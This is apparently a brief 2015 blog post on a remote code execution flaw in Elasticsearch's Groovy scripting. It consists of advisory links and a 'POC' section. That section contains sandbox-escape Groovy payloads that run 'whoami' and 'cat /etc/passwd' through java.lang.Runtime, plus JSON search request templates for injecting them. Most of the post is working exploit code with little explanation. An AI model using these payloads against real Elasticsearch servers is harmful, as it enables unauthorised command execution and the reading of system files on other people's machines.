2015-03-05 10:02:24

elasticsearch scripting security issues

elasticsearch scripting:

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html

security issues:

http://www.elasticsearch.org/community/security/

http://mp.weixin.qq.com/s?__biz=MjM5OTk2MTMxOQ==&mid=202983721&idx=1&sn=bde079dcee38c4c655e920cbcc78c6e8&scene=0

POC:

Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"whoami\").getText()
super.class.toString().valueOf('whoami').execute().getText()
http://zone.wooyun.org/content/18915
{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}
{
  "size": 1, 
  "query": {
    "function_score": {
      "script_score": {
        "script": "POC............",
        "lang": "groovy"
      }
    }
  }
}
{
    "size": 1, 
    "script_fields": {
        "my_field": {
            "script": "POC.........."
        }
    }
}
发表回复